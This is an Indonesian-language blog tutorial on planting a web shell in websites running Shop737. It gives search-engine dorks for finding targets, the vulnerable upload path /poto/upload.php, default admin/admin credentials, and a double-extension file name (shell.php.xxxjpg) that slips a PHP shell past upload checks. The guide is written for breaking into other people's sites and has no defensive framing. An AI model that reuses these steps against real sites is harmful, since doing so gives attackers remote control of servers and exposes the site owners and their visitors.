Cara Tanam Shell Dengan Teknik Shop737
Oleh
chmood
Selamat siang Teman-Teman :)
kali ini saya kasih tau Cara Tanam Shell Dengan Teknik Shop737
shop737 itu bug lama tapi baru ngtrend sekarang wkwkwk :v
yaudah langsung saja ke TKP. . .
sebelumnya siapkan shell nya,
shellnya harus di rename terlebih dahulu
kasih .xxxjpg dibelakang shell
menjadi shell.php.xxxjpg
dork via google: intext:"Powered by Shop737"
dork via bing: IP: 103.29.215.201 "/poto/"
note: 103.29.215.201 -> ip bisa di ganti
exploit: /poto/upload.php
contoh: wwwtarget.com/poto/upload.php
saya asumsikan sudah dapat web yang vuln..
www.target.com/poto/
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirQ6_0hyOKhBoQ-2VaUm1cvbGiZHpLaXQJlJkeWKevnc2A-6QnpyuIXJ6VdUOpcDo2RLipdWmNEMvR4BE47NVofvsHO-ltWxCdJ-HnwgsHPP48RrLipdvJjxVqgsA63RIN4NhsRPuc8cc/s400-rw/12.png)
sekarang kita kasih exlpoitnya
jadi wwwtarget.com/poto/upload.php
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh90vEpf5OQ82mIPxqFC0IvkLEgNbKqRiPatmGVaW-89B7k6l4XtvioLALD9hGUlR3XEc2WCkEaG8MTgHwMkcf-b_XkszNCxuY-39sqR61PeKyW-l4EloZ-NRhTMWSo6OneaFvClJZj0fw/s1600-rw/13.png)
suruh masukin username sama password
username: admin
password: admin
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGsVhuWkySHSq-caSiDhdn2bfJZkzB0b-hDI5ZzGSvajDhyphenhyphenhOerN0Ciqtmrru1YFZC_Hx-rHEnk_Bz8Xix4OGX0J-8VQn3upE0ovAKESoC9vkRim9uOL7inSEhGkU-54wWdaNYnABLsk8/s400-rw/14.png)
liat gambar di atas^
upload shell anda tadi yang sebelumnya sudah di rename.
hasilnya www.target.com/poto/[kategori]/shell.php.xxxjpg
Semoga bermanfaat :)
Komentar